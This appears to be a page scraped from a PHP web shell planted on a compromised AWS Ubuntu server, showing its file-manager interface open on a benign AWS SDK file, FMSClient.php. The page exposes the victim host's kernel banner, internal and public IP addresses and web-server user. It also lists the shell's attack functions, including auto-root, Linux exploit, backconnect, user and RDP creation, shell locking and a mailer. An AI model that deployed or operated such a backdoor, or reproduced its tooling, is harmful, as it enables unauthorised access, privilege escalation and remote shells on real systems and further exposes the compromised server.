Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.142.251.204
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
aws /
Aws /
FMS /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxr-sr-x
FMSClient.php
2.48
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FMSClient.php
<?php namespace Aws\FMS; use Aws\AwsClient; /** * This client is used to interact with the **Firewall Management Service** service. * @method \Aws\Result associateAdminAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise associateAdminAccountAsync(array $args = []) * @method \Aws\Result deleteNotificationChannel(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteNotificationChannelAsync(array $args = []) * @method \Aws\Result deletePolicy(array $args = []) * @method \GuzzleHttp\Promise\Promise deletePolicyAsync(array $args = []) * @method \Aws\Result disassociateAdminAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise disassociateAdminAccountAsync(array $args = []) * @method \Aws\Result getAdminAccount(array $args = []) * @method \GuzzleHttp\Promise\Promise getAdminAccountAsync(array $args = []) * @method \Aws\Result getComplianceDetail(array $args = []) * @method \GuzzleHttp\Promise\Promise getComplianceDetailAsync(array $args = []) * @method \Aws\Result getNotificationChannel(array $args = []) * @method \GuzzleHttp\Promise\Promise getNotificationChannelAsync(array $args = []) * @method \Aws\Result getPolicy(array $args = []) * @method \GuzzleHttp\Promise\Promise getPolicyAsync(array $args = []) * @method \Aws\Result getProtectionStatus(array $args = []) * @method \GuzzleHttp\Promise\Promise getProtectionStatusAsync(array $args = []) * @method \Aws\Result listComplianceStatus(array $args = []) * @method \GuzzleHttp\Promise\Promise listComplianceStatusAsync(array $args = []) * @method \Aws\Result listMemberAccounts(array $args = []) * @method \GuzzleHttp\Promise\Promise listMemberAccountsAsync(array $args = []) * @method \Aws\Result listPolicies(array $args = []) * @method \GuzzleHttp\Promise\Promise listPoliciesAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result putNotificationChannel(array $args = []) * @method \GuzzleHttp\Promise\Promise putNotificationChannelAsync(array $args = []) * @method \Aws\Result putPolicy(array $args = []) * @method \GuzzleHttp\Promise\Promise putPolicyAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) */ class FMSClient extends AwsClient {}
Close